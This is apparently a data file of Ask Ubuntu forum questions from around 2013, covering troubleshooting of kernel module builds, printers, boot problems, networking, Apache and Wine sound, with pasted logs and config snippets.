385605	compiling hid-apple modules for apple wireless keyboard	i 'm trying to compile the hid modules with a modified hid-apple.c code , that enables me to swap the fn and ctrl key . i 'm following this excellent guide , except i 'm downloading the newest linux source ( linux-source-3.11.0 ) . i 'm not sure if i can post the hid-apple.c code , so i wont , but it can be found in the end of the guide as well . in the previous kernel build , everything went smoothly and i made the module work just as i wanted , now however , i get a compiler error when compiling hid-apple.c . i managed to pipe the stdout & stderr : make : entering directory `/usr/src/linux-headers-3.11.0-14-generic' cc [ m ] /home/user/ ... /linux-3.11.0/drivers/hid/hid-apple.o in file included from /home/user/ ... /linux-3.11.0/drivers/hid/hid-apple.c:21:0 : /home/user/ ... /linux-3.11.0/drivers/hid/hid-apple.c:431:40 : error : ‘usb_device_id_apple_atv_ircontrol’ undeclared here ( not in a function ) { hid_usb_device ( usb_vendor_id_apple , usb_device_id_apple_atv_ircontrol ) , ^ include/linux/hid.h:565:47 : note : in definition of macro ‘hid_usb_device’ .bus = bus_usb , .vendor = ( ven ) , .product = ( prod ) ^ make [ 1 ] : *** [ /home/user/ ... /linux-3.11.0/drivers/hid/hid-apple.o ] error 1 make : *** [ _module_/home/user/ ... /linux-3.11.0/drivers/hid ] error 2 make : leaving directory `/usr/src/linux-headers-3.11.0-14-generic' it seems strange that this code compiled just fine before , but not now . can anybody tell me what is wrong ? ps . i 'm using ubuntu 13.10 , 64 bit . edit 1 : after comparing the original hid-apple.c and the modified hid-apple.c , i 've noticed that # include < linux/usb.h > is not included in the original file . i have tried out-commenting it , but with no luck - i get the same error message ...
385607	ubuntu 12.10 & canon lbp7750	i ca n't get a network printer running ... ubuntu 12.10 , 64 bit cups version : 1.6.1 printer : canon lbp7750 i already installed the driver from canon . ( using .deb package ) . but if i print , i just get some characters ... and also message : `` if you can read this , you are using wrong driver for your printer '' . i installed cups-driver and ufr ii driver ( both 64 bit ) , then restarted cups and finally registered printer ( ppd ) at at printer spooler . any hints ? edit : works with driver for lbp5360 ( but not duplex , but do not know if 5360 even has duplex )
385608	can i run nautilus 3.4 in ubuntu 13.10 ?	will nautilus 3.4 work with 13.10 ? there are many features about the older version that i liked that gnome unfortunately removed . i a little worried because this post how do i install nemo file manager ? warns not to install nemo ( the nautilus fork motivated by the changes from 3.4 to 3.6 ) in 13.10 . this warning has to do with playing well with unity ... so maybe a better question would be : have there been any changes to unity since 12.04 that would make nautilus 3.4 not function correctly , or at all ? thanks
385611	13.10 crashing frequently	so i just put a pc together loaded ubuntu 13.10 and it 's been crashing at least once a day . i have : samsung 840 evo 120gb , core i5-4570 , asus h87m-e , asus nvidia 8400gs , kingston hyperx blu 8gbx2 1600 ddr3 , fsp group 400w 80 plus gold . i 'm using nvidia driver from nvidia ( no noveau drivers ) . at the moment of crash ( this last time ) i was moving a window from one screen to the other and it was auto re-sizing . this is what the syslog had : dec 3 13:47:14 whoopsie [ 915 ] : last message repeated 7 times dec 3 13:48:24 whoopsie [ 915 ] : last message repeated 7 times dec 3 13:49:36 whoopsie [ 915 ] : last message repeated 6 times ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @ ^ @
385617	scripting bzr commands	can someone push me in the right direction to either use a shell script or python to make a script to simplify pushing a bzr branch to launchpad ? the script process would be simple : cd /directory/to/code ask for commit comment bzr commit - m $ comment bzr push lp : ~path/to/code
385621	natural scolling does n't work after i installed it on ubuntu12.04	i installed natural scrolling on ubuntu 12.04 . i even have that little icon on top ! but nothing has changed ! the screen still moves up as i move down ! i do n't use a mouse just two fingers with my keyboard . what am i doing wrong ?
385622	can i get rid of virus , by re-imaging the 32 bits desktop with ubuntu ?	wanted to use ubuntu to recover data from corrupted external hard drive . so happened have to re-image a 32 bits vista desktop to get rid of virus . how do i re-image the desktop with ubuntu ? do i re-format the desktop internal hard drive before or after installing ubuntu ? and how ? do n't want vista anymore . thanks in advance . ( i 'm a complete ubuntu novice and complete idiot about pc desktop ) geoff
385623	testing flash games in ubuntu	i 'm looking for a good way to test flash games under ubuntu . every way i try causes very low framerate . i know that there is no way to enable hardware acceleration for flash movies , so i tried to run it through wine and framerate was even worse than in google chrome flash player . is it even possible to get decent performance ? the game i 'm trying to run uses stage3d so it requires hardware acceleration to run well . maybe someone already had success with it ? i would appreciate any suggestions ! thank you .
385624	ubuntu 12.04 not booting after boot repair	i 've done a clean install of ubuntu 12.04 lts on my hp probook 4540s . i 've done it several times , but now there was something different . i had windows 7 on it , which i 've removed by formating the partitions at the installing . i 've made a 300mb fat32 efi partition for boot a 3gb swap area and an ext4 for root/home . grub did not work , as usually , so i 've done the boot repair , using live boot from a usb . it still wo n't work . grub does not want to show up . it said something like i should set my system to boot from sda1/efi/ubuntu/grubx64 . how should i set it ? what could fix this problem . thank you .
385625	cpu *forced* to be almost 100 % idle ?	yesterday the load on my ubuntu server ( ubuntu 12.04.3 lts ( gnu/linux 3.8.0-33-generic x86_64 ) ) went up to above 2.0 after restarting it . at the same time the cpu seems to be idle only ( i could even see on my monitoring that the temperature of the cpu is lower since this problem started ) . two graphs that show my problem ( system is monitored using munin ) : i suppose this has something to do with a kernel update or something similar since the server went banana just after restarting it . however , there are no new updates and restarting is n't helping at this time . what can i do about this ? or how can i specify that it should not reboot using the same kernel ? ( just in case this is the problem ) additional information : myself @ server : ~ $ ps aux | sort -r -k3 | head -11 user pid % cpu % mem vsz rss tty stat start time command mysql 1452 0.0 2.1 492560 42760 ? ssl 21:05 0:00 /usr/sbin/mysqld root 849 0.0 0.4 50080 9640 ? ss 21:05 0:00 /usr/sbin/munin-node colord 771 0.0 0.4 451800 9680 ? sl 21:05 0:00 /usr/lib/x86_64-linux-gnu/colord/colord root 1854 0.0 0.4 193552 8592 ? ss 21:05 0:00 /usr/sbin/apache2 -k start root 1531 0.0 0.3 36684 6980 ? s 21:05 0:00 ddclient - sleeping for 200 seconds myself 2151 0.0 0.3 28056 7832 pts/1 ss 21:06 0:00 -bash www-data 3752 0.0 0.3 194040 6348 ? s 21:24 0:00 /usr/sbin/apache2 -k start www-data 3749 0.0 0.3 194040 6256 ? s 21:24 0:00 /usr/sbin/apache2 -k start www-data 1889 0.0 0.3 194040 6056 ? s 21:05 0:00 /usr/sbin/apache2 -k start and myself @ server : ~ $ iostat linux 3.8.0-34-generic ( server ) 04.12.2013 _x86_64_ ( 2 cpu ) avg-cpu : % user % nice % system % iowait % steal % idle 0,22 0,45 0,15 0,05 0,00 99,13 device : tps kb_read/s kb_wrtn/s kb_read kb_wrtn sda 3,12 10,00 30,32 397952 1207137 sdb 0,11 0,77 0,12 30566 4598 sdc 0,04 0,15 0,12 6073 4598 md0 0,14 0,88 0,11 35113 4480
385627	why did i a get a bad archive mirror ?	when i was installing ubuntu non physical address extension ( pae ) 12.04 onto my ibm t42 type 2378 , i got a bad archive mirror . i live in the usa . i selected the default archive mirror us.ubuntu.com . i also got this message to get more info check /var/log/sys/og or virtual console 4 . i do not know what that means and where to go to get the report .
385631	installing cernlib package in ubuntu 12.04	i 'm trying to install the cernlib package in ubuntu 12.04 . i tried using sudo apt-get install cernlib this seems to work up to some point . the last lines of the output are processing triggers for libc-bin ... ldconfig deferred processing now taking place /sbin/ldconfig.real : ca n't link /usr/local/lib//usr/local/lib/libtmv_symband.so.0 to libtmv_symband.so.0 /sbin/ldconfig.real : ca n't link /usr/local/lib//usr/local/lib/libtmv.so.0 to libtmv.so.0 any ideas of what is happening ? many thanks
385634	how can i sync my ipod 7th gen with rhythmbox in ubuntu 12.04 lts	i am not able to sync my ipod nano 7th gen with my rhythmbox . it has compatibility only till ipod nano 6th gen. is there any way to make it work ?
385635	how can i preseed commands to run after the preseed reboot ?	during an automated preseed installation , how can i run a script just once after the final reboot ? my use case is provisioning a machine with salt , as called by a foreman . foreman gives me a opportunity to run an arbitrary script after an installation , which boils down to a preseed/late_command . this is great , but i 'm discovering that the preseed environment does n't look quite like a normal boot ( concretely /var/run/utmp appears to be missing ) , and this is confusing salt . rather than make piece-meal fixes to the preseed environment , it would be nice to just call the tool in a `` real '' boot , such as the one after the final preseed reboot . i 'm aware of hacks like adding something to /etc/rc.local ( or similar ) that cleans itself up after running . before i go down that road i want to know if there is a better option within the preseeding tool itself . i 'm targeting 12.04 .
385636	what is the proper way to convert .flac files to 320 kbit/sec .mp3 ?	my latest challenge is finding out the correct way to convert several .flac files to 320k .mp3 's . does anyone know how to do this , maybe with avconv , without using an elaborate python script , decompressing the files to .wav first , or any other complicated scheme ?
385639	asus eee pc netbook update	i lost my operating system ( 7 ) on asus eee pc netbook , can i use ubuntu 12.04 for my operating system ? i was updating my operating system and i lost power and my operating system . i do not have a dvd for window 7 , so i am looking for a new operating system .
385640	installing ubuntu 32bit 12.04.3 on older hp zd7000 laptop - no icons , no kbd action	after installing ubuntu 12.04.3 on an old hp pavilion zd7000 the display is pretty and there is a user name and password dialog . after entering the password , the display has a vertical line on the left - but no icons . the mouse can move the cursor but that is the extent of any interaction . i can not create a terminal window with keyboard key sequence either . here is what i did : old hp pavilion zd7000 running windows 7 . ran dban nuke to wipe disk . installed ubuntu ( english , -5gmt ) - all installation options and dialogs appeared to work fine . removed disk when prompted . power off , then on . ubuntu booted up and displayed the login dialog and a gray bar across top containing some symbols/icons toward the right side of the bar . no other icons present . should i just get a newer machine ? thanks , henry
385642	i do n't find some of the things i found in synapse before upgrade , has something changed ?	i am asking this silly question because before i upgraded my os , it worked just fine . it found all the applications , files i asked it to look for . now it wont find like 30 % of the things that it found before with the previous os . any ideas ?
385644	installing graphic card drivers : `` gallium 0.4 on ati rv370 '' and `` mobile intel速 gm45 express chipset ''	i have problems with graphic card drivers both on my desktop and laptop ( different ones `` gallium 0.4 on ati rv370 '' on desktop and `` mobile intel速 gm45 express chipset '' on latitude e6500 ) . i think drivers do n't work because cards were n't recognized until i have installed mesa-utils . so firstly , how to test graphic card performance ? and secondly when i am sure that drivers are n't installed , how to install them ( on producer 's sites instructions are very hard to understand for newbies in linux like me ) i am using ubuntu 12.04 thank you in advance !
385645	will ubuntu media server meet my needs ?	can somebody help me determine what the best way to accomplish the following requirements for my media server ? movie storage / playback music storage / playback netflix , hulu , etc sports streaming from espn3.com sports streaming from other ( shady ) web streaming services the real question is how best to do the web streaming . i want to make it so that i can just plop on the couch and fire up the tv without needing to get my laptop and plug in the hdmi .
385648	ubuntu 12.04 swap usb	i 'm new in ubuntu and i tried to install the alternate cd in my machine . everything went fine but when i tried to boot a black screen and a blink cursor went on . i can boot from my usb and searching in internet i found a post suggesting that the swap was into the usb , the suggestion is to reinstall ubuntu . my question is : is there a way to fix this ( booting from the hdd of my computer ) without reinstalling ? if not , what should i do different in the new installation in order to avoid this situation in the future ? i hope you could give me a hand with this . best regards , seba .
385655	multiple os 's already installed - only have windows 7	i installed ubuntu 13.10 to my usb drive and i reboot my computer and choose boot from usb drive and all is fine and dandy . i click install , connect to wifi , and then when you are prompted to select either delete all other os , create custom partition , or go along with a standard installation - my computer does not give me the option for a standard and also states that i have multiple os 's installed . i just did a full reset on my computer . wiped the hard drive , reset all computer settings and went straight to downloading ubuntu .
385659	ubunutu installation on toshiba satellite e205 ?	i am trying to install ubuntu in my toshiba satellite e-205 laptop ? it is giving me error of target/something something . when i try to skip , try again or abort it wont let the installation happen . why ?
385662	private repo sync and multiple versions	i 'm using debmirror to sync repos for versions of ubuntu . i started with 12.04 lts and am now creating 13.10 . i 'm downloading the entire repo for each version , however i just wanted to verify whether or not this was needed . debmirror is syncing main , restricted , universe , and multiverse . are universe and multiverse shared between versions ( ex : 12.04 and 13.10 ) ? i 'm trying to avoid duplicating data as 12.04 's sync is around 96gb and 13.10 is around the same . along with this question , are there any good guides to setting up a repo to handle multiple versions ? right now i have the directories linked through apache for each version http : // [ host ] /precise and http : // [ host ] /saucy [ update ] well , i did discover through using meld that the directories contain different names for specific versions so in theory i could merge the directories into one giant structure . i would still need to maintain separate sources.list files for each version unless i wanted to make a complex sources.list file to do version seeking at update .
385665	history does n't display as sudo user	on a few of my ubuntu installations , when i run sudo su and become sudo user , i can type history and view a list of commands run as sudo user . however , on my one ubuntu installation , for some reason when i run sudo su and type history , i just get this : $ sudo su # history 1 history but i know for certain that a lot of commands were run as sudo user , but when i ssh out and ssh back into my ubuntu server , they do not display , like how they do on the other servers . do i have some switch or something disabled on this one server ? how can i regain access to view the history of commands run as sudo user ?
385666	how can i fix the graphical mode on ubuntu 12.04 on powerpc g4	recently i got install ubuntu on a mac with the alternate-powerpc version , but at every start up the display shows that there is a problem with my graphical adapter and display and the system is running on low level graphics . i tried to re-install gnome through apt-get install ubuntu-desktop and nothing . then , i downloaded the ati driver pack for ubuntu , but this prompt me that it is not compatible with powerpc architecture . can any one suggest me how to fix this problem to enjoy of ubuntu , please ? if is needed , the computer is with ram 512 mb and a ati graphical adapter .
385669	lenovo ideapad battery limit	i have an ideapad y400 running ubuntu 13.10 . it previously ran windows 8 , and had a lenovo utility to limit the battery charge to 60 % . now that i 've installed ubuntu , of course , the utility is gone . is there a way i can limit the charge level ? tp_smapi works for this purpose for thinkpads , but i have an ideapad , which apparently is n't supported .
385672	changing shell from zsh to bash	my web server was tampered by someone who was using zsh shell . i feel more comfortable using bash shell , as that 's the defaults that come with ubuntu and os x ( the two main operating systems i use ) . but this questions is focused on ubuntu server . i have 4 websites running on this web server , i use byobu , i use tmux , i use ruby/ruby on rails , node.js , apache , a few daemons . if i switch the current root shell from zsh to bash , could there be any negative side effects that might result from this switch ? for example , will processes be killed because their parent process ( the shell ) has been switched ?
385677	using rsync to mirror folders on nas	i have an old netbook that i use as a torrent server running utorrent on ubuntu and accessing with the webui , at the moment i add links through the ui and then manually copy the files over to my nas . what i 'd like to be able to do is set utorrent to move completed downloads into a folder where everything that 's there is copied to my nas , ideally using a crontab to do it every so often so i do n't have to run it manually . sadly i know almost nothing about linux and al my attempts have failed . is this possible/ how can i go about achieving this ?
385679	ubuntu tweak -- miscellaneous category-natural scroller does n't 'work !	i have ubuntu tweak for ubuntu 12.04 . under the miscellaneous category in the tweaks section i asked the natural scroller to be `` on '' . it does not work ! what is wrong ? thanks
385680	wpa-roam when ethernet is connected	as far as i understand , wpa-roam searches for a wifi connection when no ethernet connection is present . i 'm trying to get my pi to take photos on a gopro over the wifi connection , but interface with the pi over ethernet . is there any settings i can put in my /etc/network/interfaces to enable roaming even when an ethernet connection is present ? current configs are as follows : /etc/network/interfaces pi @ raspberrypi ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet static netmask 255.255.255.0 address 192.168.2.13 gateway 192.168.2.1 allow-hotplug wlan0 iface wlan0 inet manual wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp iface gopro inet dhcp /etc/wpa_supplicant/wpa_supplicant.conf pi @ raspberrypi ~ $ sudo cat /etc/wpa_supplicant/wpa_supplicant.conf ctrl_interface=dir=/var/run/wpa_supplicant group=netdev update_config=1 network= { ssid= '' gopro-bp-657282068582037 '' psk= '' goprohero '' priority=5 id_str= '' gopro '' } i can happily connect using : sudo wpa_supplicant -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf but i 'm looking to automatically associate with the gopro
385681	disable duplicate `` unable to connect to wireless network '' notification on gnome-shell	i 'm on ubuntu 12.04.3 and to start with , i 've read about this : https : //bugs.launchpad.net/ubuntu/+source/network-manager-applet/+bug/912702 and my problem is a bit similar , but a little different . and the difference , mainly , is that i use gnome-shell . here 's the problem : whenever i get `` unable to connect to wireless network '' notification , i get it both as a window and as a gnome-shell dimmed-background notification . question 1 : is it possible to get only one kind of notification and not both ? how ? thanks . in the bug above , we do get multiple and duplicate windows of the same notification . that works the same way as this `` unable to connect to wireless network '' notification . now here 's problem number 2 : when gnome-shell produces more than one of these dimmed-background notification , it crashes after you click any of the buttons . then you have to wait until it realizes it crashed and restart the shell , or in some cases , wait forever because it somehow failed to realize that gnome-shell actually crashed . so comes ... , question 2 : is there a way to just completely disable this kind of notification ? ( and ... just in case we missed that , this post : how to disable notification from network-manager is not perfectly the answer to this question . i 've already disabled that a long time ago . ; - ) ) thank you very much .
385684	does ubuntu come with anti-vrius	does unbuntu come with a free anti-virus ? i can not seem to find one . does it have one or does it not . when i looked on the website and on searches it said nothing about this .
385688	wine sound issues	so , i 've had ubuntu 13.10 on my machine for a few weeks now , and everything was perfect . i installed wine and proceeded to play some games with it , mainly bit trip runner 2 . well , one day i did a reinstall of the runner 2 game , and ran it . booted up fine , but then this terrible sound began playing . it was n't static or distorted or anything , it was the normal game audio but it was playing under itself twice , the second time with a slight delay , it was like i had to windows of the game open but i was sure i didn't i toyed around with winecfg for a while and mainly looked at the audio tab . it said my wine audio driver was winepulse.drv , which is what it always normally said . i decided to reinstall wine completely , doing exactly the same thing as i did the first time , but after checking the audio tab , it now said it was using winealsa.drv . i hoped it had chosen that as a better driver or something , so i ran runner 2 again and it was even worse , now the sound was n't even understandable and was really speed up . any ideas on what to do ? i 'm not the greatest with linux , but i can do most things ...
385690	second wubi installation not working	i successfully used wubi on my winxp computer . i un installed it now recently i tried it again and i get the ubuntu option , but when i choose it , the screen goes black . the hd activity light shows activity . i dont even get the pink , purple screen ! i may not have used my logitec wireless keyboard and mouse , i ca n't remember . could that be it ? thanks for any help
385696	apache2 server failed to start after enabling `mod_rewrite` , returns `` operation not permitted '' errors	i am trying to install cakephp ( a php framework ) which requires to enable mod_rewrite . for this i followed enable mod_rewrite answer . but after restarting my server it says : nitish @ nitish-g31t-m7 : ~ $ service apache2 restart restarting web server apache2 /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername /usr/sbin/apache2ctl : 87 : ulimit : error setting limit ( operation not permitted ) apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ( 13 ) permission denied : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down unable to open logs **action 'start ' failed . ** the apache error log may have more information . what this means ? how can i enable mod_rewrite ?
385700	run ubuntu from removed hdd via usb enclosure ?	my laptop 's current hard drive has only ubuntu 13.10 installed on it . my goal is to remove it , put it in a sata to usb enclosure , and run it from there . i 'll be putting a drive with windows 8 back in the computer . before i go mucking about inside it i 'd like to know - is this a feasible idea ? edit trailrider was on the money . it works just fine and secureboot is not an issue ; however , even with no drive put back inside and no other drives plugged in ubuntu recognizes its drive as sdb1 . with an ssd connected through usb 3.0 , it seems to be running as fast as it did while inside . i have n't tried any heavy lifting yet , though . edit interestingly , after i put the windows drive back in the the computer and booted to windows once , it would no longer boot again from the ubuntu drive . once i put the ubuntu drive back in the computer it booted just fine again . i 'll have to investigate more .
